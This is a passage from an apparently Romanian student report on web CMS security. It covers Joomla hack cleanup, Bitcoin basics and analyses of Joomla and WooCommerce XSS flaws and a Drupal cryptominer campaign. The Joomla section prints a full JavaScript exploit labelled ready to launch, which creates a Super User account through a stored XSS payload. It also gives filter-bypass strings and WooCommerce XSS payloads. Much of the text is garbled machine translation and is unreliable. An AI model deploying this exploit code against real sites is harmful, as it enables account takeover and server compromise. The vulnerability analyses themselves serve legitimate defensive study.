3.7.4 Fixarea Joomla Hack: Vericat ,i s ,ierele modicate
De cele mai multe ori, hackerii v a modic a s ,ierele pentru a injecta mesaje spam.
Poate provoca o adev arat a dezordine ^ n dvs. instalare. S-ar putea s a avet ,i nevoie de o
instalare proasp at a. Pentru a evita toate acestea, asigurat ,i-v a c a p astrat ,i ^ ntotdeauna
de rezerv a. ^In timp ce analiz am s ,ierele dup a un Joomla Hack, comanda di vine la
^ ndem^ an a. Aceasta ajut a la vericarea s ,ierelor modicate. Toate s ,ierele Joomla sunt
disponibile public pe Github. Acest lucru poate  folosit pentru comparat ,ie. Pentru a
verica integritatea s ,ierului de baz a cu comenzi SSH:
$ mkdir joomla $ cd joomla
%^In primul r^ and, am creat un director numit joomla s ,i am trecut la asta.
$ wget https://github.com/joomla/joomla-cms/releases/download/3.6.4/
Joomla_3.6.4-Stabil-Full_Package.tar.gz
$ tar -zxvf Joomla_3.6.4-Stable-Full_Package.tar.gz
%Comanda wget a desc arcat fis ,ierele Joomla de la GitHub.
A doua linie de cod apoi le extrage.
$ diff -r joomla-3.6.4 ./public_html
%^In sf^ ars ,it, comanda dif este aici compar^ and cont ,inutul.
%De data aceasta ne uit am la fis ,ierul
%public_html. ^In mod similar, putet ,i verifica mai multe fis ,iere.
%Mai mult,fis ,ierele pot fi verificate manual. Trebuie doar s a v a
%conectat ,i utiliz^ and orice client FTP
%s,i s a verificat ,i fis ,ierele. SSH v a permite s a listat ,i modific arile
%fis ,ierelor.
$ find ./ -type f -mtime -15
Aici, aceast a comand a SSH dezv aluie s ,ierele modicate ^ n ultimele 15 zile. ^In mod
similar, voi poate schimba marcajul de timp. Fii atent la orice s ,iere modicate recent.
Consultat ,i expert ,ii de securitate Astra acum pentru a g asi s ,i a repara un hacker Joomla.
Paravanul nostru puternic v a protejeaz a site-ul de la XSS, LFI, RFI, SQL Injection, Bad
Boots, Scanner Vulnerabilitate automata.
12

3.7.5 Fixarea Joomla Hack: Vericat ,i jurnalele utilizatorilor
Jurnalele de sistem sunt cel mai bun instrument pentru a identica cauza unei hack-uri
Joomla. ^Inregistreaz a jurnalele de system toate activit at ,ile anterioare care au avut loc.
Deci, ori de c^ ate ori are loc o inject ,ie XSS sau SQL, exist a ^ ntotdeauna o ^ nregistrare a
cererii. ^In plus, hackerii au tendint ,a de a crea noi administrator conturi. Dac a dorit ,i s a
vericat ,i utilizatorii suspectat ,i, atunci:
Dac a vedet ,i c a utilizatorii se logheaz a de la IP-uri necunoscute, eliminat ,i-le. Mai mult,
folosit ,i raportul de diagnostic Google pentru a g asi cauza. V a ofer a o viziune cuprinz atoare
de pe site-ul dvs. Dac a site-ul dvs. este pe lista neagr a, lucrat ,i mai aproape de Google.
Raportul de diagnostic va da tu caut ,i lista neagr a. Utilizat ,i-l pentru a g asi s ,i elimina
infect ,ia!
3.7.6 Fixarea Joomla Hack: Actualizare
De cele mai multe ori, o hacking Joomla are loc din cauza s ,ierelor necorespunz atoare.
Asigurat ,i-v a c a toate modulele dvs. sunt actualizate. De asemenea, asigurat ,i-v a c a
software-ul server este actualizat. Pornit ,i mereu Actualiz arile automate. Este posibil
ca sunetul s a consume resurse, dar este o practic a sigur a. Problemele legate de securita-
tea Joomla v a pot ment ,ine ocupat ,i. Deci, dac a v a este greu s a cur at ,at,i hack-ul Joomla,
consultat ,i expert ,ii.
4 Bitcoin Mining
4.1 Introducere
Bitcoin este o criptocurrency, o form a de numerar electronic.
Este o moned a digital a descentralizat a, f ar a o banc a central a sau
un singur administrator, care poate  trimis a de la utilizator la
utilizator ^ n ret ,eaua Bitcoin peer-to-peer f ar a a  nevoie de inter-
mediari.
Tranzact ,iile sunt vericate de noduri de ret ,ea prin criptograe
s,i^ nregistrate^ ntr-un registru public distribuit numit bloc de bloc.
Bitcoin a fost inventat de o persoan a necunoscut a sau de un grup
de oameni care folosea numele Satoshi Nakamoto s ,i a fost lansat
ca software open source ^ n 2009. Bitcoinurile sunt create ca o
recompens a pentru un proces cunoscut sub numele de minerit. Acestea pot  schimbate
pentru alte valute, produse s ,i servicii. Cercetarea produs a de Universitatea din Cambridge
estimeaz a c a ^ n 2017 au existat 2,9 p^ an a la 5,8 milioane de utilizatori unici care utilizeaz a
un portofel de tip criptocurrency, cei mai mult ,i folosindu-se bitcoin.
Bitcoin a fost criticat pentru utilizarea sa ^ n tranzact ,iile ilegale, consumul ridicat de
energie electric a, volatilitatea pret ,urilor, furturile din schimburi, s ,i de economis ,tii renumit ,i
care sust ,in c a "ar trebui s a aib a un pret ,zero". Bitcoin a fost, de asemenea, folosit ca
o investit ,ie, des ,i mai multe agent ,ii de reglementare au emis alerte de investitori despre
Bitcoin.
4.2 Creat ie
Numele de domeniu "bitcoin.org" a fost ^ nregistrat la 18 august 2008. La 31 octombrie
2008, un link c atre o lucrare scris a de Satoshi Nakamoto intitulat a Bitcoin: Un sistem
13

electronic de numerar de tip Peer-to-Peer a fost postat pe o list a de corespondent , a crip-
tograc a. Nakamoto a implementat software-ul bitcoin ca un cod open-source s ,i la lansat
^ n ianuarie 2009. Identitatea lui Nakamoto r am^ ane necunoscut a.
La 3 ianuarie 2009, ret ,eaua Bitcoin a fost creat a atunci c^ and Nakamoto a exploatat
primul bloc al lant ,ului, cunoscut sub numele de bloc de genez a. Embedded ^ n colajul
acestei blocuri a fost textul "The Times 03 / Jan / 2009 Cancelar la un pas de al doilea
salvare pentru b anci". Aceast a not a se refer a la un titlu publicat de The Times s ,i a fost
interpretat at^ at ca o amprent a de timp, c^ at s ,i ca un comentariu privind instabilitatea
cauzat a de sectorul bancar cu rezerve fract ,ionare.
Receptorul primei tranzact ,ii bitcoin a fost cypherpunk Hal Finney, care a creat primul
sistem de vericare a funct ,ion arii reutilizabile (RPoW) ^ n 2004. [24] Finney a desc arcat
software-ul bitcoin la data lans arii sale s ,i la 12 ianuarie 2009 a primit zece biti din Naka-
moto. Alt ,i suporteri timpurii ai lui cypherpunk au fost creatorii unor predecesori bitcoin:
Wei Dai, creatorul de b-bani, s ,i Nick Szabo, creatorul de aur bit ,i.^In 2010, prima tranzact ,ie
comercial a cunoscut a folosind bitcoin a ap arut atunci c^ and programatorul Laszlo Hanyecz
a cump arat dou a pizza de Papa John pentru 10,000.
Analis ,tii Blockchain estimeaz a c a Nakamoto a exploatat aproximativ un milion de
bitcoins [28] ^ nainte de a disp area ^ n 2010, c^ and a predat cheia de alert a a ret ,elei s ,i
a controlat depozitul de coduri c atre Gavin Andresen. Andresen a devenit mai t^ arziu
dezvoltator principal la Fundat ,ia Bitcoin. Andresen a c autat atunci s a descentralizeze
controlul. Aceast a oportunitate de st^ anga pentru controversa de a se dezvolta pe parcursul
viitoarei dezvolt ari a bitcoinului, spre deosebire de autoritatea perceput a a contribut ,iilor
lui Nakamoto.
4.3 Blockchain
Blocul de bit ,i bitcoin (Blockchain) este un registru public care^ nregistreaz a tranzact ,iile
bitcoin. Acesta este implementat ca un lant ,de blocuri, ecare bloc care cont ,ine un
hash din blocul anterior p^ an a la blocul de genez a [c] al lant ,ului. O ret ,ea de noduri de
comunicat ,ie care ruleaz a software bitcoin ment ,ine blocul de blocuri. 215-219 Tranzact ,iile
pl atitorului de formula X trimit bit ,i bitului Y c atre beneciarul pl at ,ii Z sunt difuzate ^ n
aceast a ret ,ea utiliz^ and aplicat ,ii software disponibile.
Nodurile de ret ,ea pot valida tranzact ,iile, le pot ad auga ^ n copia c art ,ii s ,i apoi le pot
difuza pe alte noduri. Pentru a realiza vericarea independent a a lant ,ului de proprietate,
ecare nod de ret ,ea stocheaz a propria copie a blocului. La ecare 10 minute, se creeaz a un
nou grup de tranzact ,ii acceptate, numit bloc, care se adaug a blocului s ,i se public a rapid la
toate nodurile, f ar a a necesita o supraveghere central a. Acest lucru permite software-ului
bitcoin s a determine c^ and a fost cheltuit un anumit bitcoin, ceea ce este necesar pentru
a preveni dublarea cheltuielilor. Un registru convent ,ional ^ nregistreaz a transferurile de
facturi sau bilete la ordin care exist a ^ n afar a de acesta, dar blocul de blocuri este singurul
loc ^ n care pot  spuse c a existent ,a bitcoinelor exist a sub form a de rezultate necheltuite
ale tranzact ,iilor.
4.4 Mineritul Bitcoin
Mineritul este un serviciu de p astrare a ^ nregistr arilor realizat prin utilizarea puterii de
procesare a calculatorului. [Minerii] p astreaz a blocul consistent, complet s ,i nemodicabil
prin gruparea repetat a a tranzact ,iilor de emisie ^ ntr-un bloc, care este apoi transmis c atre
ret ,ea s ,i vericat de c atre destinatar noduri. Fiecare bloc cont ,ine o hash criptograc a
SHA-256 a blocului precedent, leg^ and-o astfel de blocul anterior s ,i d^ and blocului numele
14

s au.
Pentru a  acceptat de restul ret ,elei, un nou bloc trebuie s a cont ,in a o dovad a a muncii
(PoW). Sistemul utilizat se bazeaz a pe programul anti-spam al lui Adam Back, 1997,
Hashcash. PoW cere minerilor s a g aseasc a un num ar numit un nonce, astfel ^ nc^ at atunci
c^ and cont ,inutul blocului este s ,ters ^ mpreun a cu nonce, rezultatul este numeric mai mic
dec^ at t ,inta de dicultate a ret ,elei. Aceast a dovad a este us ,or pentru orice nod din ret ,ea
pentru a verica, dar este extrem de consumatoare de timp pentru a genera, ca pentru un
hash criptograc securizat, minerii trebuie s a ^ ncerce mai multe valori diferite de nonce
(de obicei, succesiunea valorilor testate este numerele naturale ascendente: 0, 1, 2, 3, …
^ nainte de a ^ ndeplini obiectivul de dicultate.
La ecare 2016 blocuri (aproximativ 14 zile la aproximativ 10 minute pe bloc), obiec-
tivul de dicultate este ajustat ^ n funct ,ie de performant ,a recent a a ret ,elei, cu scopul de
a ment ,ine timpul mediu ^ ntre blocurile noi la zece minute. ^In acest fel, sistemul se adap-
teaz a automat la cantitatea total a de energie minier a din ret ,ea.^Intre 1 martie 2014 s ,i
1 martie 2015, num arul mediu de persoane care nu au f acut minuni a trebuit s a ^ ncerce
^ nainte de a crea un nou bloc crescut de la 16,4 chintilion la 200,5 quintillion.
Sistemul de vericare a muncii, al aturi de ^ nl ant ,uirea blocurilor, face ca modic arile
blocului s a e extrem de greu, deoarece un atacator trebuie s a modice toate blocurile
ulterioare pentru ca modic arile unui bloc s a e acceptate. Deoarece blocurile noi sunt
minate tot timpul, dicultatea modic arii unui bloc cres ,te odat a cu trecerea timpului, iar
num arul blocurilor ulterioare (numite s ,i conrm ari ale blocului dat) cres ,te.
15

5 Aplicat ie
5.1 Vulnerabilitate Joomla!
5.1.1 Joomla Hack
Joomla! este una dintre cele mai populare sisteme de management al cont inutului
din lume (CMS). Acesta permite utilizatorilor sa creeze site-uri web  si aplicat ii online
puternice. Mai mult de 3 la suta din site-uri Web execut a Joomla!,  si reprezint a mai
mult de 9 la suta din cota de piat a CMS. Din iulie 2017, Joomla! a fost descarcat de
peste 82 de milioane de ori. Peste 7.800 extensii gratuite  si comerciale sunt disponibile de
ocial Joomla! Extensia Directory,  si mai sunt disponibile din alte surse. Am descoperit 2
Cross-Site Scripting (XSS) vulnerabilitat i ^ n Joomla!. Acestea sunt identicate ca CVE-
2017-7985  si CVE-2017-7,986. Dup a analizarea patch-urilor pentru aceste probleme, am
descoperit mai multe vulnerabilitati XSS. Joomla! identic a ^ n continuare aceste vulne-
rabilit at i noi ca CVE-2017-7985,  si a postat un anunt  de securitate separat. A sa cum
este detaliat, aceste vulnerabilit at i exist a, deoarece Joomla! nu reu se ste sa dezinfecteze
datele introduse de utilizatorul r au intent ionat, atunci c^ and utilizatorii posteaz a sau edi-
teaz a un articol. Atacatorii la distant a ar putea exploata aceste vulnerabilit at i pentru a
rula cod malit ios pe browser-ul victimei. Acest lucru ar putea permite atacatorului de la
distant  a de a obt ine controlul Joomla!al contului victimei. Cu toate acestea, ^ n cazul ^ n
care victima are permisiunea mai mare, cum ar  administrator de sistem, atacatorul de
la distant  a ar putea obt ine de fapt, un control complet al serverului web. Aceste vulne-
rabilit at i afecteaza Joomla!, mai exact Versiunile CMS 1.5.0 prin 3.7.2.
5.1.2 Context
^In patch-uri pentru CVE-2017-7985  si CVE-2017-7986, Joomla! det ine caractere l-
trate special, cum ar  Ghilimele duble dreapta,  si coduri HTML vulnerabile, cum ar
"formaction.\ Dar procesul de ltrare este similar cu o list a neagr a Sanitizer, ceea ce
^ nseamna c a se potrive ste pur  si simplu cu codurile hack  si site-ul poate i atacat.
5.1.3 Analiz a
^In aceasta analiz a am folosit un cont de test"yzy1\. Acest cont are doar permisiunea
editorului, ceea ce ^ nseamna ca nu este permis sa utilizeze elemente HTML complete ^ n
patch-urile Joomla! CVE-2017-7985  si CVE-2017-7986
Precum observ am in gura 1 si gura 2
16

Figura 1: Fix pentru update-ul CVE-2017-7985
Figura 2: Fix pentru CVE-2017-7986
Pentru ca e un ltru de list a neagra XSS, am constatat c a, prin ad augarea"% 0A%
0min\ marca HTML, un atacator poate s a ocoleasca ltrul  si insereaz a coduri HTML
17

arbitrare. De exemplu, POC4^ n CVE-2017-7985 poate  schimbat. Am adaugat 0A%
0min% ^ n spatele Ghilimelelelor duble dreapta, ceea ce a permis codul XSS sa e declan sat
at^ at pe prima pagina  si backend, a sa cum este prezentat ^ n gurile 3, 4  si 5. Pentru CVE-
2017-7986 poate s a e aplicat acela si mod.
Figura 3: Introducerea noului PoC pentru CVE-2017-7985
4Proof of Concept
18

Figura 4: Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n prima pagin a
Figura 5: Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n pagina de
administrator
19

Figura 6: Atacul codurilor HTML folosind \%0d%0a"
Bazat pe acest lucru, am g asit o modalitate mai u soara de a declan sa atacul XSS prin
simpla ad augare a"% 0min% 0A\  sir pentru tag-uri HTML arbitrare, cum ar  un SVG,
img,  si a sa mai departe. Aici este un exemplu cu o eticheta SVG5.
Figura 7: Inserare PoC ^ n tag-ul SVG
Codurile vor  declan sate at^ at pe prima pagin a, dar  si pagina de administrator, a sa
cum este prezentat ^ n gurile 8  si 9.
5Scalable Vector Graphics
20

Figura 8: SVG tag XSS ^ n prima pagin a
Figura 9: SVG tag XSS ^ n pagina de administrator
21

5.1.4 Exploit
//Exploit code ready to launch
1 var request = new XMLHttpRequest();
2
3 var req = new XMLHttpRequest();
4
5 var id = '';
6
7 var boundary = Math.random().toString().substr(2);
8
9 var space = "–––––––";
10
11 request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true);
12
13 request.onload = function() {
14
15 if (request.status >= 200 && request.status < 400) {
16
17 var resp = request.responseText;
18
19 var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
20
21 id = myRegex.exec(resp)[1];
22
23 req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true);
24
25 req.setRequestHeader("content-type", "multipart/form-data; boundary=–––––––––" + boundary);
26
27 var multipart = space + boundary +
28
29 "\r\nContent-Disposition: form-data; name=\"jform[name]\"" +
30
31 "\r\n\r\nFortinet Yzy\r\n" +
32
33 space + boundary +
34
35 "\r\nContent-Disposition: form-data; name=\"jform[username]\"" +
36
37 "\r\n\r\nfortinetyzy\r\n" +
38
39 space + boundary +
40
41 "\r\nContent-Disposition: form-data; name=\"jform[password]\"" +
42 "\r\n\r\nfortinet\r\n" +
43
44 space + boundary +
45
46 "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" +
22

47
48 "\r\n\r\nfortinet\r\n" +
49
50 space + boundary +
51
52 "\r\nContent-Disposition: form-data; name=\"jform[email]\"" +
53
54 "\r\n\r\nzyyang@fortinet.com\r\n" +
55
56 space + boundary +
57
58 "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" +
59
60 "\r\n\r\n\r\n" +
61
62 space + boundary +
63
64 "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" +
65
66 "\r\n\r\n\r\n" +
67
68 space + boundary +
69
70 "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" +
71
72 "\r\n\r\n\r\n" +
73
74 space + boundary +
75
76 "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" +
77
78 "\r\n\r\n0\r\n" +
79
80 space + boundary +
81
82 "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" +
83
84 "\r\n\r\n0\r\n" +
85
86 space + boundary +
87
88 "\r\nContent-Disposition: form-data; name=\"jform[block]\"" +
89
90 "\r\n\r\n0\r\n" +
91
92 space + boundary +
93
94 "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" +
95
96 "\r\n\r\n0\r\n" +
23

97
98 space + boundary +
99
100 "\r\nContent-Disposition: form-data; name=\"jform[id]\"" +
101
102 "\r\n\r\n0\r\n" +
103
104 space + boundary +
105
106 "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" +
107
108 "\r\n\r\n8\r\n" +
109
110 space + boundary +
111
112 "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" +
113
114 "\r\n\r\n\r\n" +
115
116 space + boundary +
117
118 "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" +
119
120 "\r\n\r\n\r\n" +
121
122 space + boundary +
123
124 "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" +
125
126 "\r\n\r\n\r\n" +
127
128 space + boundary +
129
130 "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" +
131
132 "\r\n\r\n\r\n" +
133
134 space + boundary +
135
136 "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" +
137
138 "\r\n\r\n\r\n" +
139
140 space + boundary +
141
142 "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" +
143
144 "\r\n\r\n\r\n" +
145
146 space + boundary +
24

147
148 "\r\nContent-Disposition: form-data; name=\"task\"" +
149
150 "\r\n\r\nuser.apply\r\n" +
151
152 space + boundary +
153
154 "\r\nContent-Disposition: form-data; name=\"" + id + "\"" +
155
156 "\r\n\r\n1\r\n" +
157
158 space + boundary + "–\r\n";
159
160 req.onload = function() {
161
162 if (req.status >= 200 && req.status < 400) {
163
164 var resp = req.responseText;
165
166 console.log(resp);
167
168 }
169
170 };
171
172 req.send(multipart);
173
174 }
175
176 };
177
178
179
180 request.send();
181 //Injection succesfully complete.
25

Ar at am acum cum un atacator folosind un cont scazut permisiuni este ^ n m asura s a
exploateze aceasta vulnerabilitate pentru a crea un cont Super utilizator. Pentru a realiza
acest lucru, voi construi mai ^ nt^ ai un mic JavaScript pentru a adauga un Super utilizator.
Acest script folose ste permisiunea administratorului site-ului pentru a obt ine indicativul
CSRF6de utilizator ^ n pagina de editare"index.php? Option = com users & vizualizare
= user & aspect = editare\, apoi posteaza "add Super" la cererea utilizatorului la server
folosind token-ul CSRF. ^In acest exemplu, noul utilizator Super este Fortinet YZY  si
parola este Fortinet.
Un atacator poate adauga acest cod la Joomla! prin exploatarea vulnerabilit at ii XSS, a sa
cum se arata ^ n gura 10.
Figura 10: Ad augarea codului XSS
Dup a ce administratorul site-ului vede articolul ^ n pagina de administrator, este creat
imediat un cont Super User. A se vedea gurile 11  si 12.
6Cross-Site Request Forgery
26

Figura 11: Administratorul site-ului declan seaz a atacul XSS ^ n pagina de
administrator
Figura 12: Un nou SuperUser ad augat de atacator
Atacatorul acum se poate conecta la Joomla! cu permisiunea utilizatorului SuperU-
SER  si ^ ncarc a un  sier web prin instalarea unui plugin. Acest lucru este prezentat ^ n
gurile 13  si 14.
27

Figura 13: ^Incarcarea unui shell web folosind Super contul de utilizator al
atacatorului
Figura 14: Atacatorul este capabil de a accesa shell-ul web  si execut a comenzi
28

5.1.5 Solutie
Tot i userii platformei Joomla! trebuie sa fac a upgrade la ultima versiune cat mai
urgent!
^In plus, organizat ,iile care utilizeaz a solut ,iile Fortinet IPS sunt deja protejate^ mpotriva
acestor vulnerabilit at ,i cu urm atoarele semn aturi:
ˆJoomla!.Core.create-a-post.XSS
ˆJoomla!.Core.LineFeed.Char.XSS.A
ˆJoomla!.Core.LineFeed.Char.XSS.B
29

5.2 Vulnerabilitate WordPress WooCommerce XSS { Hack asu-
pra unui cont de client cu o imagine
Aceast a vulnerabilitate XSS (CVE-2019-9168) exist a ^ n as ,ajul zoom al funct ,iei Pho-
toswipe, unde WooCommerce nu a reus ,it s a sterilizeze datele titlului s ,i imaginilor unei
imagini. Aceast a vulnerabilitate poate permite unui atacator s a injecteze codul arbitrar
^ ntr-un site web alimentat de WooCommerce. Atunci c^ and o victim a acceseaz a pagina
web cu codul de atac introdus, atacatorul ar putea s a obt ,in a controlul asupra browseru-
lui victimei, s a init ieze sesiunea curent a WooCommerce, s a adune informat ,ii protejate, etc.
Aceast a vulnerabilitate XSS afecteaz a versiunile WooCommerce ^ nainte de 3.5.4.
Echipa WooCommerce a emis un nou patch software. Din rezumat, vedem c a remedierea
WooCommerce acum securizeaz a datele titlului s ,i legenda.
Figura 15: Patch CVE-2019-9168
Analiz a
Pentru a reproduce aceast a vulnerabilitate, primul pas este ^ nc arcarea unei imagini s ,i
introducerea codului JavaScript ^ n c^ ampul Imagine a imaginii. ^In WordPress, ^ nc arcarea
unei imagini ^ ntr-un cont cu permisiuni reduse nu necesit a permisiunea de a accesa plug-
in-ul WooCommerce.
30

Figura 16: Upload imagine
Deoarece numai conturile cu permisiuni ridicate precum admin pot ad auga cod Ja-
vaScript arbitrar, vom introduce codul securizat
"&lt;img src=1 onerror=prompt('1')\&gt;"
(not a: elimin am citatele duble de la ^ nceput  si sf^ ar sit) folosind un cont cu permisiuni
redus(user obi snuit).
31

Figura 17: Injectare cod XSS
Apoi, odat a ce cineva cu privilegii si permisiuni reduse adaug a aceast a imagine in-
fectat a ca imagine a produselor sau ^ ntr-o galerie de produse, codul XSS este inserat ^ n
pagina produsului.
Figura 18: Imaginea compromisa uploadat a in pagina de Produse
Acum, c^ and o victim a vizualizeaz a acest produs s ,i m are ste imaginea produsului, codul
32

XSS va  executat automat. Detaliat ^ n gurile 19 s ,i 20.
Figura 19: Zoom pe imaginea produsului
Figura 20: Declan sarea atacului XSS
Pentru a simplica procesul de atac, un atacator ar putea modica titlul s ,i subiectul
unei imagini local, schimb^ andu-le ^ n
33

"&lt;img src=1 onerror=prompt('2')&gt;"
(not a: elimin am citatele duble).
Figura 21: Crearea s ,ierului PoC la nivel local
Atacatorul poate apoi s a ^ mp art as ,easc a aceast a imagine administratorului site-ului.
Atunci c^ and managerul foloses ,te aceast a imagine ca imagine a produsului sau ^ n galeria
de produse, codul XSS va  inserat.
34

Figura 22: Managerul de site utilizeaz a s ,ierul PoC ca imagine a produsului
Figura 23: Declan sarea atacului XSS
Un atacator ar putea exploata aceast a vulnerabilitate pentru a ataca sesiunea curent a
a utilizatorului, pentru a controla browserul victimei s ,i multe altele. Deoarece obiectivele
sunt site-uri web de eCommerce, atacatorul ar putea apoi s a colecteze date delicate pre-
cum informat ,ii bancare, adrese etc.
Solut ie
35

Tot ,i utilizatorii versiunilor vulnerabile ale WooCommerce sunt ^ ncurajat ,i s a treac a ime-
diat la ultima versiune. ^In plus, organizat ,iile care au implementat solut ,ii Fortinet IPS
sunt deja protejate de aceast a vulnerabilitate cu urm atoarea semn atur a:
WooCommerce.Photoswipe.Caption.XSS
5.3 Vulnerabilitatea Drupal (CVE-2018-7602) a fost exploatat a
pentru a furniza malware de tip "Monero-Mining"
Am reus ,it s a observ am o serie de atacuri de ret ,ea care ex-
ploateaz a CVE-2018-7602, un defect de securitate ^ n cadrul de
gestionare a cont ,inutului Drupal. Deocamdat a, aceste atacuri vi-
zeaz a transformarea sistemelor afectate ^ n robot ,i de exploatare
Monero. De remarcat sunt c aile sale de a se ascunde ^ n spatele
ret ,elei Tor pentru a evita detectarea s ,i cum veric a mai ^ nt^ ai sis-
temul afectat ^ nainte de ao infecta cu un program malware de tip
cryptocurrency-mining. ^In timp ce aceste atacuri duc ^ n prezent
la furtul de resurse s ,i la malware-ul care ^ ncetines ,te performant ,a
sistemului, vulnerabilitatea poate  utilizat a ca o us , a pentru alte
amenint , ari.
Ce este CVE-2018-7602?
CVE-2018-7602 este o vulnerabilitate la execut ,ia codului la distant , a (RCE) care afec-
teaz a versiunile 7 s ,i 8 ale Drupal, care a fost patch-uri pe 25 aprilie 2018. Defect ,iunea
de securitate a fost descoperit a dup a ce echipa de securitate a Drupal a examinat o alt a
vulnerabilitate, CVE-2018-7600 de asemenea, cunoscut sub numele de Drupalgeddon 2,
patch-uri pe 28 martie 2018). Echipa de securitate a echipei Drupal a raportat, de ase-
menea, c a CVE-2018-7602 este exploatat a ^ n mod activ ^ n s alb aticie. Conform analizei
tehnice a unui cercet ator, exploatarea cu succes a vulnerabilit at ,ii presupune ridicarea per-
misiunii de a modica sau s ,terge cont ,inutul unui site web executat de Drupal.
Cum duce Exploit-ul la minerul Monero?
As ,a cum se arat a ^ n gurile 24 s ,i 25, atacurile pe care le-am v azut exploat^ and CVE-
2018-7602 descarc a un script shell, care va prelua apoi un downloader ELF (Executable
and Linkable Format) (detectat de Trend Micro ca ELF DLOADR.DHG). Dup a cum se
arat a ^ n Figura 26, desc arc atorul va ad auga o intrare crontab (care, ^ n sistemele bazate pe
Unix, cont ,ine comenzi pentru a  executate) pentru a se actualiza automat. ^In acest caz,
comanda este de a verica leg atura de la care se descarc a s ,i interpreteaz a un script numit
up.jpg prezent^ and ca s ,ier JPEG. Desc arc atorul bazat pe ELF recupereaz a, de asemenea,
un program malware de tip Minero (COINMINER TOOLXMR.O-ELF64) s ,i ^ l instaleaz a
pe mas ,ina afectat a.
36

Figura 24: Fragment de cod care arat a modul ^ n care CVE-2018-7602 este
exploatat a
Figura 25: Fragment de cod care arat a modul ^ n care este recuperat scriptul shell
Figura 26: O intrare crontab ad augat a de malware pentru a se actualiza automat
Ce face aceste atacuri notabile?
Downloader-ul foloses ,te metoda HTTP 1.0 POST pentru a trimite date ^ napoi ^ n funct ,ia
SEND DATA (). Calea t ,int a pentru metoda POST este /drupal/df.php. Tracul HTTP
1.0 este destul de neobis ,nuit ^ n aceste tipuri de atacuri, deoarece majoritatea tracului
HTTP de c atre multe organizat ,ii este deja ^ n HTTP 1.1 sau o versiune ulterioar a. S ,i
av^ and ^ n vedere aceast a variant , a aparent a, anticip am acest lucru ca un model ^ n viitoa-
rele atacuri.
37

Figura 27: Codurile de asamblare ale funct ,iei SEND DATA a downloader-ului
Minerul Monero instalat ^ n mas ,in a este XMRig7cu surs a deschis a (versiunea 2.6.3).
De asemenea, veric a dac a mas ,ina trebuie compromis a sau nu. C^ and minerul ^ ncepe s a
ruleze, acesta ^ s ,i schimb a numele procesului ^ n
[^ $ I $ ^]
s,i acceseaz a s ,ierul /tmp/dvir.pid. Figura 27 prezint a acest comportament furios, pe care
atacatorul / operatorul la ad augat ^ n versiunea lor modicat a de XMRig. Acesta este un
steag ros ,u pe care administratorii sau profesionis ,tii ^ n domeniul securit at ,ii informat ,iilor
^ l pot lua ^ n considerare pentru a discerne activit at ,ile r au-intent ,ionate, cum ar  im-
plementarea sistemelor de detectare s ,i prevenire a intruziunilor bazate pe gazd a sau a
criminalit at ,ii performante.
7XMRig-Miner Trojan
38

Figura 28: O parte din XMRig inclus a ^ n malware-ul de tip minerit de criptograe
39

Figura 29: Pseudo-codurile inversate ale funct ,iei principale () a lui Monero-miner
De unde provin atacurile?
Atacurile sunt notabile pentru m asurile de precaut ,ie pe care le-au luat prin faptul c a se
ascund ^ n spatele ret ,elei Tor. Am reus ,it s a urm am urm arirea malware-ului la 197 [.] 231
[.] 221 [.] 211. Pe baza informat ,iilor despre WhoIs, segmentul IP 197 [.] 231 [.] 221
[.] 0 [/] 24 pare s a apart ,in a unui furnizor de ret ,ea privat a virtual a (VPN). ^In plus, am
constatat c a adresa IP este un nod de ies ,ire Tor – gateway-uri de unde tracul criptat Tor
este transmis tracului normal de internet.
De fapt, Trend Micro8blocat 810 atacuri din ultima lun a provenind de la aceast a
adres a IP. Av^ and ^ n vedere c a este un nod de ies ,ire Tor, nu suntem siguri dac a aceste
atacuri sunt legate de ^ nc arc atura utilizat a de mineritul Monero sau provin de la un singur
actor de amenint ,are. Majoritatea atacurilor de la aceast a adres a IP exploateaz a Hear-
tbleed (CVE-2014-0160). Celelalte atacuri pe care le-am observat au fost exploatate Shell-
Shock (CVE-2014-6271), o vulnerabilitate de dezv aluire a informat ,iilor ^ n WEB GoAhead
(CVE-2017-5674) s ,i o eroare de scurgere de memorie ^ n Apache (CVE-2004-0113). Trend
Micro a blocat, de asemenea, conect arile de fort , a brute-force File Transfer Protocol (FTP)
s,i Secure Shell (SSH) de la aceast a adres a IP. Ret ,inet ,i c a aceste atacuri exploateaz a chiar
s,i vulnerabilit at ,i bazate pe Linux sau Unix, subliniind important ,a ap ar arii ^ n profunzime.
Acest lucru este valabil ^ n special pentru ^ ntreprinderile ale c aror aplicat ,ii web s ,i site-uri
– cum ar  cele care utilizeaz a Drupal – gestioneaz a date s ,i tranzact ,ii sensibile. Chiar s ,i
un defect de securitate dat^ and ^ nc a din 2014 poate  folosit ca punct de intrare pentru
atacatori.
8Enterprise Cybersecurity Solutions
40

Figura 30: TOR informat ,ii nod de ies ,ire (2018/06/16) pentru 197 [.] 231 [.] 221 [.]
211
Protect ie ^ mpotriva acestei amenint , ari
Patching s ,i actualizarea nucleului Drupal stabiles ,te vulnerabilitatea pe care aceast a amenint ,are
o exploateaz a. Buletinul de securitate al Drupal ofer a ^ ndrum ari privind remedierea
vulnerabilit at ,ii, ^ n special pentru cei care ^ nc a folosesc versiuni nefolosite ale Drupal.
Dezvoltatorii, precum s ,i administratorii de sisteme s ,i profesionis ,tii din domeniul secu-
rit at ,ii informat ,iilor ar trebui, de asemenea, s a practice securitatea prin design: securizarea
aplicat ,iilor din care sunt stocate s ,i gestionate date personale s ,i corporative, asigur^ and, de
asemenea, us ,urint ,a ^ n utilizare s ,i funct ,ionalitate.
